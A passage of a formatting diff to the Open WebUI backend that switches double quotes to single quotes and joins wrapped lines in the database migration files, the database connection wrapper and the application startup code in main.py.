timestamp = pw.BigIntegerField() class Meta: - table_name = "modelfile" + table_name = 'modelfile' @migrator.create_model class Prompt(pw.Model): @@ -208,7 +208,7 @@ class Prompt(pw.Model): timestamp = pw.BigIntegerField() class Meta: - table_name = "prompt" + table_name = 'prompt' @migrator.create_model class Tag(pw.Model): @@ -218,7 +218,7 @@ class Tag(pw.Model): data = pw.TextField(null=True) class Meta: - table_name = "tag" + table_name = 'tag' @migrator.create_model class User(pw.Model): @@ -230,24 +230,24 @@ class User(pw.Model): timestamp = pw.BigIntegerField() class Meta: - table_name = "user" + table_name = 'user' def rollback(migrator: Migrator, database: pw.Database, *, fake=False): """Write your rollback migrations here.""" - migrator.remove_model("user") + migrator.remove_model('user') - migrator.remove_model("tag") + migrator.remove_model('tag') - migrator.remove_model("prompt") + migrator.remove_model('prompt') - migrator.remove_model("modelfile") + migrator.remove_model('modelfile') - migrator.remove_model("document") + migrator.remove_model('document') - migrator.remove_model("chatidtag") + migrator.remove_model('chatidtag') - migrator.remove_model("chat") + migrator.remove_model('chat') - migrator.remove_model("auth") + migrator.remove_model('auth')
backend/open_webui/internal/migrations/002_add_local_sharing.py+2 −4 modified@@ -36,12 +36,10 @@ def migrate(migrator: Migrator, database: pw.Database, *, fake=False): """Write your migrations here.""" - migrator.add_fields( - "chat", share_id=pw.CharField(max_length=255, null=True, unique=True) - ) + migrator.add_fields('chat', share_id=pw.CharField(max_length=255, null=True, unique=True)) def rollback(migrator: Migrator, database: pw.Database, *, fake=False): """Write your rollback migrations here.""" - migrator.remove_fields("chat", "share_id") + migrator.remove_fields('chat', 'share_id')
backend/open_webui/internal/migrations/003_add_auth_api_key.py+2 −4 modified@@ -36,12 +36,10 @@ def migrate(migrator: Migrator, database: pw.Database, *, fake=False): """Write your migrations here.""" - migrator.add_fields( - "user", api_key=pw.CharField(max_length=255, null=True, unique=True) - ) + migrator.add_fields('user', api_key=pw.CharField(max_length=255, null=True, unique=True)) def rollback(migrator: Migrator, database: pw.Database, *, fake=False): """Write your rollback migrations here.""" - migrator.remove_fields("user", "api_key") + migrator.remove_fields('user', 'api_key')
backend/open_webui/internal/migrations/004_add_archived.py+2 −2 modified@@ -36,10 +36,10 @@ def migrate(migrator: Migrator, database: pw.Database, *, fake=False): """Write your migrations here.""" - migrator.add_fields("chat", archived=pw.BooleanField(default=False)) + migrator.add_fields('chat', archived=pw.BooleanField(default=False)) def rollback(migrator: Migrator, database: pw.Database, *, fake=False): """Write your rollback migrations here.""" - migrator.remove_fields("chat", "archived") + migrator.remove_fields('chat', 'archived')
backend/open_webui/internal/migrations/005_add_updated_at.py+16 −20 modified@@ -45,22 +45,20 @@ def migrate(migrator: Migrator, database: pw.Database, *, fake=False): def migrate_sqlite(migrator: Migrator, database: pw.Database, *, fake=False): # Adding fields created_at and updated_at to the 'chat' table migrator.add_fields( - "chat", + 'chat', created_at=pw.DateTimeField(null=True), # Allow null for transition updated_at=pw.DateTimeField(null=True), # Allow null for transition ) # Populate the new fields from an existing 'timestamp' field - migrator.sql( - "UPDATE chat SET created_at = timestamp, updated_at = timestamp WHERE timestamp IS NOT NULL" - ) + migrator.sql('UPDATE chat SET created_at = timestamp, updated_at = timestamp WHERE timestamp IS NOT NULL') # Now that the data has been copied, remove the original 'timestamp' field - migrator.remove_fields("chat", "timestamp") + migrator.remove_fields('chat', 'timestamp') # Update the fields to be not null now that they are populated migrator.change_fields( - "chat", + 'chat', created_at=pw.DateTimeField(null=False), updated_at=pw.DateTimeField(null=False), ) @@ -69,22 +67,20 @@ def migrate_sqlite(migrator: Migrator, database: pw.Database, *, fake=False): def migrate_external(migrator: Migrator, database: pw.Database, *, fake=False): # Adding fields created_at and updated_at to the 'chat' table migrator.add_fields( - "chat", + 'chat', created_at=pw.BigIntegerField(null=True), # Allow null for transition updated_at=pw.BigIntegerField(null=True), # Allow null for transition ) # Populate the new fields from an existing 'timestamp' field - migrator.sql( - "UPDATE chat SET created_at = timestamp, updated_at = timestamp WHERE timestamp IS NOT NULL" - ) + migrator.sql('UPDATE chat SET created_at = timestamp, updated_at = timestamp WHERE timestamp IS NOT NULL') # Now that the data has been copied, remove the original 'timestamp' field - migrator.remove_fields("chat", "timestamp") + migrator.remove_fields('chat', 'timestamp') # Update the fields to be not null now that they are populated migrator.change_fields( - "chat", + 'chat', created_at=pw.BigIntegerField(null=False), updated_at=pw.BigIntegerField(null=False), ) @@ -101,29 +97,29 @@ def rollback(migrator: Migrator, database: pw.Database, *, fake=False): def rollback_sqlite(migrator: Migrator, database: pw.Database, *, fake=False): # Recreate the timestamp field initially allowing null values for safe transition - migrator.add_fields("chat", timestamp=pw.DateTimeField(null=True)) + migrator.add_fields('chat', timestamp=pw.DateTimeField(null=True)) # Copy the earliest created_at date back into the new timestamp field # This assumes created_at was originally a copy of timestamp - migrator.sql("UPDATE chat SET timestamp = created_at") + migrator.sql('UPDATE chat SET timestamp = created_at') # Remove the created_at and updated_at fields - migrator.remove_fields("chat", "created_at", "updated_at") + migrator.remove_fields('chat', 'created_at', 'updated_at') # Finally, alter the timestamp field to not allow nulls if that was the original setting - migrator.change_fields("chat", timestamp=pw.DateTimeField(null=False)) + migrator.change_fields('chat', timestamp=pw.DateTimeField(null=False)) def rollback_external(migrator: Migrator, database: pw.Database, *, fake=False): # Recreate the timestamp field initially allowing null values for safe transition - migrator.add_fields("chat", timestamp=pw.BigIntegerField(null=True)) + migrator.add_fields('chat', timestamp=pw.BigIntegerField(null=True)) # Copy the earliest created_at date back into the new timestamp field # This assumes created_at was originally a copy of timestamp - migrator.sql("UPDATE chat SET timestamp = created_at") + migrator.sql('UPDATE chat SET timestamp = created_at') # Remove the created_at and updated_at fields - migrator.remove_fields("chat", "created_at", "updated_at") + migrator.remove_fields('chat', 'created_at', 'updated_at') # Finally, alter the timestamp field to not allow nulls if that was the original setting - migrator.change_fields("chat", timestamp=pw.BigIntegerField(null=False)) + migrator.change_fields('chat', timestamp=pw.BigIntegerField(null=False))
backend/open_webui/internal/migrations/006_migrate_timestamps_and_charfields.py+20 −20 modified@@ -38,45 +38,45 @@ def migrate(migrator: Migrator, database: pw.Database, *, fake=False): # Alter the tables with timestamps migrator.change_fields( - "chatidtag", + 'chatidtag', timestamp=pw.BigIntegerField(), ) migrator.change_fields( - "document", + 'document', timestamp=pw.BigIntegerField(), ) migrator.change_fields( - "modelfile", + 'modelfile', timestamp=pw.BigIntegerField(), ) migrator.change_fields( - "prompt", + 'prompt', timestamp=pw.BigIntegerField(), ) migrator.change_fields( - "user", + 'user', timestamp=pw.BigIntegerField(), ) # Alter the tables with varchar to text where necessary migrator.change_fields( - "auth", + 'auth', password=pw.TextField(), ) migrator.change_fields( - "chat", + 'chat', title=pw.TextField(), ) migrator.change_fields( - "document", + 'document', title=pw.TextField(), filename=pw.TextField(), ) migrator.change_fields( - "prompt", + 'prompt', title=pw.TextField(), ) migrator.change_fields( - "user", + 'user', profile_image_url=pw.TextField(), ) @@ -87,43 +87,43 @@ def rollback(migrator: Migrator, database: pw.Database, *, fake=False): if isinstance(database, pw.SqliteDatabase): # Alter the tables with timestamps migrator.change_fields( - "chatidtag", + 'chatidtag', timestamp=pw.DateField(), ) migrator.change_fields( - "document", + 'document', timestamp=pw.DateField(), ) migrator.change_fields( - "modelfile", + 'modelfile', timestamp=pw.DateField(), ) migrator.change_fields( - "prompt", + 'prompt', timestamp=pw.DateField(), ) migrator.change_fields( - "user", + 'user', timestamp=pw.DateField(), ) migrator.change_fields( - "auth", + 'auth', password=pw.CharField(max_length=255), ) migrator.change_fields( - "chat", + 'chat', title=pw.CharField(), ) migrator.change_fields( - "document", + 'document', title=pw.CharField(), filename=pw.CharField(), ) migrator.change_fields( - "prompt", + 'prompt', title=pw.CharField(), ) migrator.change_fields( - "user", + 'user', profile_image_url=pw.CharField(), )
backend/open_webui/internal/migrations/007_add_user_last_active_at.py+6 −6 modified@@ -38,7 +38,7 @@ def migrate(migrator: Migrator, database: pw.Database, *, fake=False): # Adding fields created_at and updated_at to the 'user' table migrator.add_fields( - "user", + 'user', created_at=pw.BigIntegerField(null=True), # Allow null for transition updated_at=pw.BigIntegerField(null=True), # Allow null for transition last_active_at=pw.BigIntegerField(null=True), # Allow null for transition @@ -50,11 +50,11 @@ def migrate(migrator: Migrator, database: pw.Database, *, fake=False): ) # Now that the data has been copied, remove the original 'timestamp' field - migrator.remove_fields("user", "timestamp") + migrator.remove_fields('user', 'timestamp') # Update the fields to be not null now that they are populated migrator.change_fields( - "user", + 'user', created_at=pw.BigIntegerField(null=False), updated_at=pw.BigIntegerField(null=False), last_active_at=pw.BigIntegerField(null=False), @@ -65,14 +65,14 @@ def rollback(migrator: Migrator, database: pw.Database, *, fake=False): """Write your rollback migrations here.""" # Recreate the timestamp field initially allowing null values for safe transition - migrator.add_fields("user", timestamp=pw.BigIntegerField(null=True)) + migrator.add_fields('user', timestamp=pw.BigIntegerField(null=True)) # Copy the earliest created_at date back into the new timestamp field # This assumes created_at was originally a copy of timestamp migrator.sql('UPDATE "user" SET timestamp = created_at') # Remove the created_at and updated_at fields - migrator.remove_fields("user", "created_at", "updated_at", "last_active_at") + migrator.remove_fields('user', 'created_at', 'updated_at', 'last_active_at') # Finally, alter the timestamp field to not allow nulls if that was the original setting - migrator.change_fields("user", timestamp=pw.BigIntegerField(null=False)) + migrator.change_fields('user', timestamp=pw.BigIntegerField(null=False))
backend/open_webui/internal/migrations/008_add_memory.py+2 −2 modified@@ -43,10 +43,10 @@ class Memory(pw.Model): created_at = pw.BigIntegerField(null=False) class Meta: - table_name = "memory" + table_name = 'memory' def rollback(migrator: Migrator, database: pw.Database, *, fake=False): """Write your rollback migrations here.""" - migrator.remove_model("memory") + migrator.remove_model('memory')
backend/open_webui/internal/migrations/009_add_models.py+2 −2 modified@@ -51,10 +51,10 @@ class Model(pw.Model): updated_at = pw.BigIntegerField(null=False) class Meta: - table_name = "model" + table_name = 'model' def rollback(migrator: Migrator, database: pw.Database, *, fake=False): """Write your rollback migrations here.""" - migrator.remove_model("model") + migrator.remove_model('model')
backend/open_webui/internal/migrations/010_migrate_modelfiles_to_models.py+24 −24 modified@@ -42,12 +42,12 @@ def migrate(migrator: Migrator, database: pw.Database, *, fake=False): # Fetch data from 'modelfile' table and insert into 'model' table migrate_modelfile_to_model(migrator, database) # Drop the 'modelfile' table - migrator.remove_model("modelfile") + migrator.remove_model('modelfile') def migrate_modelfile_to_model(migrator: Migrator, database: pw.Database): - ModelFile = migrator.orm["modelfile"] - Model = migrator.orm["model"] + ModelFile = migrator.orm['modelfile'] + Model = migrator.orm['model'] modelfiles = ModelFile.select() @@ -57,25 +57,25 @@ def migrate_modelfile_to_model(migrator: Migrator, database: pw.Database): modelfile.modelfile = json.loads(modelfile.modelfile) meta = json.dumps( { - "description": modelfile.modelfile.get("desc"), - "profile_image_url": modelfile.modelfile.get("imageUrl"), - "ollama": {"modelfile": modelfile.modelfile.get("content")}, - "suggestion_prompts": modelfile.modelfile.get("suggestionPrompts"), - "categories": modelfile.modelfile.get("categories"), - "user": {**modelfile.modelfile.get("user", {}), "community": True}, + 'description': modelfile.modelfile.get('desc'), + 'profile_image_url': modelfile.modelfile.get('imageUrl'), + 'ollama': {'modelfile': modelfile.modelfile.get('content')}, + 'suggestion_prompts': modelfile.modelfile.get('suggestionPrompts'), + 'categories': modelfile.modelfile.get('categories'), + 'user': {**modelfile.modelfile.get('user', {}), 'community': True}, } ) - info = parse_ollama_modelfile(modelfile.modelfile.get("content")) + info = parse_ollama_modelfile(modelfile.modelfile.get('content')) # Insert the processed data into the 'model' table Model.create( - id=f"ollama-{modelfile.tag_name}", + id=f'ollama-{modelfile.tag_name}', user_id=modelfile.user_id, - base_model_id=info.get("base_model_id"), - name=modelfile.modelfile.get("title"), + base_model_id=info.get('base_model_id'), + name=modelfile.modelfile.get('title'), meta=meta, - params=json.dumps(info.get("params", {})), + params=json.dumps(info.get('params', {})), created_at=modelfile.timestamp, updated_at=modelfile.timestamp, ) @@ -86,7 +86,7 @@ def rollback(migrator: Migrator, database: pw.Database, *, fake=False): recreate_modelfile_table(migrator, database) move_data_back_to_modelfile(migrator, database) - migrator.remove_model("model") + migrator.remove_model('model') def recreate_modelfile_table(migrator: Migrator, database: pw.Database): @@ -102,8 +102,8 @@ def recreate_modelfile_table(migrator: Migrator, database: pw.Database): def move_data_back_to_modelfile(migrator: Migrator, database: pw.Database): - Model = migrator.orm["model"] - Modelfile = migrator.orm["modelfile"] + Model = migrator.orm['model'] + Modelfile = migrator.orm['modelfile'] models = Model.select() @@ -112,13 +112,13 @@ def move_data_back_to_modelfile(migrator: Migrator, database: pw.Database): meta = json.loads(model.meta) modelfile_data = { - "title": model.name, - "desc": meta.get("description"), - "imageUrl": meta.get("profile_image_url"), - "content": meta.get("ollama", {}).get("modelfile"), - "suggestionPrompts": meta.get("suggestion_prompts"), - "categories": meta.get("categories"), - "user": {k: v for k, v in meta.get("user", {}).items() if k != "community"}, + 'title': model.name, + 'desc': meta.get('description'), + 'imageUrl': meta.get('profile_image_url'), + 'content': meta.get('ollama', {}).get('modelfile'), + 'suggestionPrompts': meta.get('suggestion_prompts'), + 'categories': meta.get('categories'), + 'user': {k: v for k, v in meta.get('user', {}).items() if k != 'community'}, } # Insert the processed data back into the 'modelfile' table
backend/open_webui/internal/migrations/011_add_user_settings.py+2 −2 modified@@ -37,11 +37,11 @@ def migrate(migrator: Migrator, database: pw.Database, *, fake=False): """Write your migrations here.""" # Adding fields settings to the 'user' table - migrator.add_fields("user", settings=pw.TextField(null=True)) + migrator.add_fields('user', settings=pw.TextField(null=True)) def rollback(migrator: Migrator, database: pw.Database, *, fake=False): """Write your rollback migrations here.""" # Remove the settings field - migrator.remove_fields("user", "settings") + migrator.remove_fields('user', 'settings')
backend/open_webui/internal/migrations/012_add_tools.py+2 −2 modified@@ -51,10 +51,10 @@ class Tool(pw.Model): updated_at = pw.BigIntegerField(null=False) class Meta: - table_name = "tool" + table_name = 'tool' def rollback(migrator: Migrator, database: pw.Database, *, fake=False): """Write your rollback migrations here.""" - migrator.remove_model("tool") + migrator.remove_model('tool')
backend/open_webui/internal/migrations/013_add_user_info.py+2 −2 modified@@ -37,11 +37,11 @@ def migrate(migrator: Migrator, database: pw.Database, *, fake=False): """Write your migrations here.""" # Adding fields info to the 'user' table - migrator.add_fields("user", info=pw.TextField(null=True)) + migrator.add_fields('user', info=pw.TextField(null=True)) def rollback(migrator: Migrator, database: pw.Database, *, fake=False): """Write your rollback migrations here.""" # Remove the settings field - migrator.remove_fields("user", "info") + migrator.remove_fields('user', 'info')
backend/open_webui/internal/migrations/014_add_files.py+2 −2 modified@@ -45,10 +45,10 @@ class File(pw.Model): created_at = pw.BigIntegerField(null=False) class Meta: - table_name = "file" + table_name = 'file' def rollback(migrator: Migrator, database: pw.Database, *, fake=False): """Write your rollback migrations here.""" - migrator.remove_model("file") + migrator.remove_model('file')
backend/open_webui/internal/migrations/015_add_functions.py+2 −2 modified@@ -51,10 +51,10 @@ class Function(pw.Model): updated_at = pw.BigIntegerField(null=False) class Meta: - table_name = "function" + table_name = 'function' def rollback(migrator: Migrator, database: pw.Database, *, fake=False): """Write your rollback migrations here.""" - migrator.remove_model("function") + migrator.remove_model('function')
backend/open_webui/internal/migrations/016_add_valves_and_is_active.py+6 −6 modified@@ -36,14 +36,14 @@ def migrate(migrator: Migrator, database: pw.Database, *, fake=False): """Write your migrations here.""" - migrator.add_fields("tool", valves=pw.TextField(null=True)) - migrator.add_fields("function", valves=pw.TextField(null=True)) - migrator.add_fields("function", is_active=pw.BooleanField(default=False)) + migrator.add_fields('tool', valves=pw.TextField(null=True)) + migrator.add_fields('function', valves=pw.TextField(null=True)) + migrator.add_fields('function', is_active=pw.BooleanField(default=False)) def rollback(migrator: Migrator, database: pw.Database, *, fake=False): """Write your rollback migrations here.""" - migrator.remove_fields("tool", "valves") - migrator.remove_fields("function", "valves") - migrator.remove_fields("function", "is_active") + migrator.remove_fields('tool', 'valves') + migrator.remove_fields('function', 'valves') + migrator.remove_fields('function', 'is_active')
backend/open_webui/internal/migrations/017_add_user_oauth_sub.py+2 −2 modified@@ -33,12 +33,12 @@ def migrate(migrator: Migrator, database: pw.Database, *, fake=False): """Write your migrations here.""" migrator.add_fields( - "user", + 'user', oauth_sub=pw.TextField(null=True, unique=True), ) def rollback(migrator: Migrator, database: pw.Database, *, fake=False): """Write your rollback migrations here.""" - migrator.remove_fields("user", "oauth_sub") + migrator.remove_fields('user', 'oauth_sub')
backend/open_webui/internal/migrations/018_add_function_is_global.py+2 −2 modified@@ -37,12 +37,12 @@ def migrate(migrator: Migrator, database: pw.Database, *, fake=False): """Write your migrations here.""" migrator.add_fields( - "function", + 'function', is_global=pw.BooleanField(default=False), ) def rollback(migrator: Migrator, database: pw.Database, *, fake=False): """Write your rollback migrations here.""" - migrator.remove_fields("function", "is_global") + migrator.remove_fields('function', 'is_global')
backend/open_webui/internal/wrappers.py+15 −17 modified@@ -10,13 +10,13 @@ log = logging.getLogger(__name__) -db_state_default = {"closed": None, "conn": None, "ctx": None, "transactions": None} -db_state = ContextVar("db_state", default=db_state_default.copy()) +db_state_default = {'closed': None, 'conn': None, 'ctx': None, 'transactions': None} +db_state = ContextVar('db_state', default=db_state_default.copy()) class PeeweeConnectionState(object): def __init__(self, **kwargs): - super().__setattr__("_state", db_state) + super().__setattr__('_state', db_state) super().__init__(**kwargs) def __setattr__(self, name, value): @@ -30,10 +30,10 @@ def __getattr__(self, name): class CustomReconnectMixin(ReconnectMixin): reconnect_errors = ( # psycopg2 - (OperationalError, "termin"), - (InterfaceError, "closed"), + (OperationalError, 'termin'), + (InterfaceError, 'closed'), # peewee - (PeeWeeInterfaceError, "closed"), + (PeeWeeInterfaceError, 'closed'), ) @@ -43,23 +43,21 @@ class ReconnectingPostgresqlDatabase(CustomReconnectMixin, PostgresqlDatabase): def register_connection(db_url): # Check if using SQLCipher protocol - if db_url.startswith("sqlite+sqlcipher://"): - database_password = os.environ.get("DATABASE_PASSWORD") - if not database_password or database_password.strip() == "": - raise ValueError( - "DATABASE_PASSWORD is required when using sqlite+sqlcipher:// URLs" - ) + if db_url.startswith('sqlite+sqlcipher://'): + database_password = os.environ.get('DATABASE_PASSWORD') + if not database_password or database_password.strip() == '': + raise ValueError('DATABASE_PASSWORD is required when using sqlite+sqlcipher:// URLs') from playhouse.sqlcipher_ext import SqlCipherDatabase # Parse the database path from SQLCipher URL # Convert sqlite+sqlcipher:///path/to/db.sqlite to /path/to/db.sqlite - db_path = db_url.replace("sqlite+sqlcipher://", "") + db_path = db_url.replace('sqlite+sqlcipher://', '') # Use Peewee's native SqlCipherDatabase with encryption db = SqlCipherDatabase(db_path, passphrase=database_password) db.autoconnect = True db.reuse_if_open = True - log.info("Connected to encrypted SQLite database using SQLCipher") + log.info('Connected to encrypted SQLite database using SQLCipher') else: # Standard database connection (existing logic) @@ -68,7 +66,7 @@ def register_connection(db_url): # Enable autoconnect for SQLite databases, managed by Peewee db.autoconnect = True db.reuse_if_open = True - log.info("Connected to PostgreSQL database") + log.info('Connected to PostgreSQL database') # Get the connection details connection = parse(db_url, unquote_user=True, unquote_password=True) @@ -80,7 +78,7 @@ def register_connection(db_url): # Enable autoconnect for SQLite databases, managed by Peewee db.autoconnect = True db.reuse_if_open = True - log.info("Connected to SQLite database") + log.info('Connected to SQLite database') else: - raise ValueError("Unsupported database connection") + raise ValueError('Unsupported database connection') return db
backend/open_webui/main.py+464 −593 modified@@ -565,7 +565,7 @@ from open_webui.constants import ERROR_MESSAGES if SAFE_MODE: - print("SAFE MODE ENABLED") + print('SAFE MODE ENABLED') Functions.deactivate_all_functions() logging.basicConfig(stream=sys.stdout, level=GLOBAL_LOG_LEVEL) @@ -578,16 +578,16 @@ async def get_response(self, path: str, scope): return await super().get_response(path, scope) except (HTTPException, StarletteHTTPException) as ex: if ex.status_code == 404: - if path.endswith(".js"): + if path.endswith('.js'): # Return 404 for javascript files raise ex else: - return await super().get_response("index.html", scope) + return await super().get_response('index.html', scope) else: raise ex -if LOG_FORMAT != "json": +if LOG_FORMAT != 'json': print(rf""" ██████╗ ██████╗ ███████╗███╗ ██╗ ██╗ ██╗███████╗██████╗ ██╗ ██╗██╗ ██╔═══██╗██╔══██╗██╔════╝████╗ ██║ ██║ ██║██╔════╝██╔══██╗██║ ██║██║ @@ -598,7 +598,7 @@ async def get_response(self, path: str, scope): v{VERSION} - building the best AI user interface. -{f"Commit: {WEBUI_BUILD_HASH}" if WEBUI_BUILD_HASH != "dev-build" else ""} +{f'Commit: {WEBUI_BUILD_HASH}' if WEBUI_BUILD_HASH != 'dev-build' else ''} https://github.com/open-webui/open-webui """) @@ -626,22 +626,18 @@ async def lifespan(app: FastAPI): # This should be blocking (sync) so functions are not deactivated on first /get_models calls # when the first user lands on the / route. - log.info("Installing external dependencies of functions and tools...") + log.info('Installing external dependencies of functions and tools...') install_tool_and_function_dependencies() app.state.redis = get_redis_connection( redis_url=REDIS_URL, - redis_sentinels=get_sentinels_from_env( - REDIS_SENTINEL_HOSTS, REDIS_SENTINEL_PORT - ), + redis_sentinels=get_sentinels_from_env(REDIS_SENTINEL_HOSTS, REDIS_SENTINEL_PORT), redis_cluster=REDIS_CLUSTER, async_mode=True, ) if app.state.redis is not None: - app.state.redis_task_command_listener = asyncio.create_task( - redis_task_command_listener(app) - ) + app.state.redis_task_command_listener = asyncio.create_task(redis_task_command_listener(app)) if THREAD_POOL_SIZE and THREAD_POOL_SIZE > 0: limiter = anyio.to_thread.current_default_thread_limiter() @@ -656,66 +652,64 @@ async def lifespan(app: FastAPI): Request( # Creating a mock request object to pass to get_all_models { - "type": "http", - "asgi.version": "3.0", - "asgi.spec_version": "2.0", - "method": "GET", - "path": "/internal", - "query_string": b"", - "headers": Headers({}).raw, - "client": ("127.0.0.1", 12345), - "server": ("127.0.0.1", 80), - "scheme": "http", - "app": app, + 'type': 'http', + 'asgi.version': '3.0', + 'asgi.spec_version': '2.0', + 'method': 'GET', + 'path': '/internal', + 'query_string': b'', + 'headers': Headers({}).raw, + 'client': ('127.0.0.1', 12345), + 'server': ('127.0.0.1', 80), + 'scheme': 'http', + 'app': app, } ), None, ) except Exception as e: - log.warning(f"Failed to pre-fetch models at startup: {e}") + log.warning(f'Failed to pre-fetch models at startup: {e}') # Pre-fetch tool server specs so the first request doesn't pay the latency cost if len(app.state.config.TOOL_SERVER_CONNECTIONS) > 0: - log.info("Initializing tool servers...") + log.info('Initializing tool servers...') try: mock_request = Request( { - "type": "http", - "asgi.version": "3.0", - "asgi.spec_version": "2.0", - "method": "GET", - "path": "/internal", - "query_string": b"", - "headers": Headers({}).raw, - "client": ("127.0.0.1", 12345), - "server": ("127.0.0.1", 80), - "scheme": "http", - "app": app, + 'type': 'http', + 'asgi.version': '3.0', + 'asgi.spec_version': '2.0', + 'method': 'GET', + 'path': '/internal', + 'query_string': b'', + 'headers': Headers({}).raw, + 'client': ('127.0.0.1', 12345), + 'server': ('127.0.0.1', 80), + 'scheme': 'http', + 'app': app, } ) await set_tool_servers(mock_request) - log.info(f"Initialized {len(app.state.TOOL_SERVERS)} tool server(s)") + log.info(f'Initialized {len(app.state.TOOL_SERVERS)} tool server(s)') await set_terminal_servers(mock_request) - log.info( - f"Initialized {len(app.state.TERMINAL_SERVERS)} terminal server(s)" - ) + log.info(f'Initialized {len(app.state.TERMINAL_SERVERS)} terminal server(s)') except Exception as e: - log.warning(f"Failed to initialize tool/terminal servers at startup: {e}") + log.warning(f'Failed to initialize tool/terminal servers at startup: {e}') # Mark application as ready to accept traffic from a startup perspective. app.state.startup_complete = True yield - if hasattr(app.state, "redis_task_command_listener"): + if hasattr(app.state, 'redis_task_command_listener'): app.state.redis_task_command_listener.cancel() app = FastAPI( - title="Open WebUI", - docs_url="/docs" if ENV == "dev" else None, - openapi_url="/openapi.json" if ENV == "dev" else None, + title='Open WebUI', + docs_url='/docs' if ENV == 'dev' else None, + openapi_url='/openapi.json' if ENV == 'dev' else None, redoc_url=None, lifespan=lifespan, ) @@ -837,9 +831,7 @@ async def lifespan(app: FastAPI): app.state.config.ENABLE_LOGIN_FORM = ENABLE_LOGIN_FORM app.state.config.ENABLE_API_KEYS = ENABLE_API_KEYS -app.state.config.ENABLE_API_KEYS_ENDPOINT_RESTRICTIONS = ( - ENABLE_API_KEYS_ENDPOINT_RESTRICTIONS -) +app.state.config.ENABLE_API_KEYS_ENDPOINT_RESTRICTIONS = ENABLE_API_KEYS_ENDPOINT_RESTRICTIONS app.state.config.API_KEYS_ALLOWED_ENDPOINTS = API_KEYS_ALLOWED_ENDPOINTS app.state.config.JWT_EXPIRES_IN = JWT_EXPIRES_IN @@ -885,15 +877,15 @@ async def lifespan(app: FastAPI): from open_webui.utils.access_control import migrate_access_control connections = app.state.config.TOOL_SERVER_CONNECTIONS -if any("access_control" in c.get("config", {}) for c in connections): +if any('access_control' in c.get('config', {}) for c in connections): for connection in connections: - migrate_access_control(connection.get("config", {})) + migrate_access_control(connection.get('config', {})) app.state.config.TOOL_SERVER_CONNECTIONS = connections arena_models = app.state.config.EVALUATION_ARENA_MODELS -if any("access_control" in m.get("meta", {}) for m in arena_models): +if any('access_control' in m.get('meta', {}) for m in arena_models): for model in arena_models: - migrate_access_control(model.get("meta", {})) + migrate_access_control(model.get('meta', {})) app.state.config.EVALUATION_ARENA_MODELS = arena_models app.state.config.OAUTH_USERNAME_CLAIM = OAUTH_USERNAME_CLAIM @@ -962,9 +954,7 @@ async def lifespan(app: FastAPI): app.state.config.RAG_FULL_CONTEXT = RAG_FULL_CONTEXT app.state.config.BYPASS_EMBEDDING_AND_RETRIEVAL = BYPASS_EMBEDDING_AND_RETRIEVAL app.state.config.ENABLE_RAG_HYBRID_SEARCH = ENABLE_RAG_HYBRID_SEARCH -app.state.config.ENABLE_RAG_HYBRID_SEARCH_ENRICHED_TEXTS = ( - ENABLE_RAG_HYBRID_SEARCH_ENRICHED_TEXTS -) +app.state.config.ENABLE_RAG_HYBRID_SEARCH_ENRICHED_TEXTS = ENABLE_RAG_HYBRID_SEARCH_ENRICHED_TEXTS app.state.config.ENABLE_WEB_LOADER_SSL_VERIFICATION = ENABLE_WEB_LOADER_SSL_VERIFICATION app.state.config.CONTENT_EXTRACTION_ENGINE = CONTENT_EXTRACTION_ENGINE @@ -975,9 +965,7 @@ async def lifespan(app: FastAPI): app.state.config.DATALAB_MARKER_FORCE_OCR = DATALAB_MARKER_FORCE_OCR app.state.config.DATALAB_MARKER_PAGINATE = DATALAB_MARKER_PAGINATE app.state.config.DATALAB_MARKER_STRIP_EXISTING_OCR = DATALAB_MARKER_STRIP_EXISTING_OCR -app.state.config.DATALAB_MARKER_DISABLE_IMAGE_EXTRACTION = ( - DATALAB_MARKER_DISABLE_IMAGE_EXTRACTION -) +app.state.config.DATALAB_MARKER_DISABLE_IMAGE_EXTRACTION = DATALAB_MARKER_DISABLE_IMAGE_EXTRACTION app.state.config.DATALAB_MARKER_FORMAT_LINES = DATALAB_MARKER_FORMAT_LINES app.state.config.DATALAB_MARKER_USE_LLM = DATALAB_MARKER_USE_LLM app.state.config.DATALAB_MARKER_OUTPUT_FORMAT = DATALAB_MARKER_OUTPUT_FORMAT @@ -999,9 +987,7 @@ async def lifespan(app: FastAPI): app.state.config.MINERU_PARAMS = MINERU_PARAMS app.state.config.TEXT_SPLITTER = RAG_TEXT_SPLITTER -app.state.config.ENABLE_MARKDOWN_HEADER_TEXT_SPLITTER = ( - ENABLE_MARKDOWN_HEADER_TEXT_SPLITTER -) +app.state.config.ENABLE_MARKDOWN_HEADER_TEXT_SPLITTER = ENABLE_MARKDOWN_HEADER_TEXT_SPLITTER app.state.config.TIKTOKEN_ENCODING_NAME = TIKTOKEN_ENCODING_NAME @@ -1053,9 +1039,7 @@ async def lifespan(app: FastAPI): app.state.config.WEB_LOADER_TIMEOUT = WEB_LOADER_TIMEOUT app.state.config.WEB_SEARCH_TRUST_ENV = WEB_SEARCH_TRUST_ENV -app.state.config.BYPASS_WEB_SEARCH_EMBEDDING_AND_RETRIEVAL = ( - BYPASS_WEB_SEARCH_EMBEDDING_AND_RETRIEVAL -) +app.state.config.BYPASS_WEB_SEARCH_EMBEDDING_AND_RETRIEVAL = BYPASS_WEB_SEARCH_EMBEDDING_AND_RETRIEVAL app.state.config.BYPASS_WEB_SEARCH_WEB_LOADER = BYPASS_WEB_SEARCH_WEB_LOADER app.state.config.ENABLE_GOOGLE_DRIVE_INTEGRATION = ENABLE_GOOGLE_DRIVE_INTEGRATION @@ -1120,13 +1104,8 @@ async def lifespan(app: FastAPI): try: - app.state.ef = get_ef( - app.state.config.RAG_EMBEDDING_ENGINE, app.state.config.RAG_EMBEDDING_MODEL - ) - if ( - app.state.config.ENABLE_RAG_HYBRID_SEARCH - and not app.state.config.BYPASS_EMBEDDING_AND_RETRIEVAL - ): + app.state.ef = get_ef(app.state.config.RAG_EMBEDDING_ENGINE, app.state.config.RAG_EMBEDDING_MODEL) + if app.state.config.ENABLE_RAG_HYBRID_SEARCH and not app.state.config.BYPASS_EMBEDDING_AND_RETRIEVAL: app.state.rf = get_rf( app.state.config.RAG_RERANKING_ENGINE, app.state.config.RAG_RERANKING_MODEL, @@ -1137,7 +1116,7 @@ async def lifespan(app: FastAPI): else: app.state.rf = None except Exception as e: - log.error(f"Error updating models: {e}") + log.error(f'Error updating models: {e}') pass @@ -1147,26 +1126,26 @@ async def lifespan(app: FastAPI): embedding_function=app.state.ef, url=( app.state.config.RAG_OPENAI_API_BASE_URL - if app.state.config.RAG_EMBEDDING_ENGINE == "openai" + if app.state.config.RAG_EMBEDDING_ENGINE == 'openai' else ( 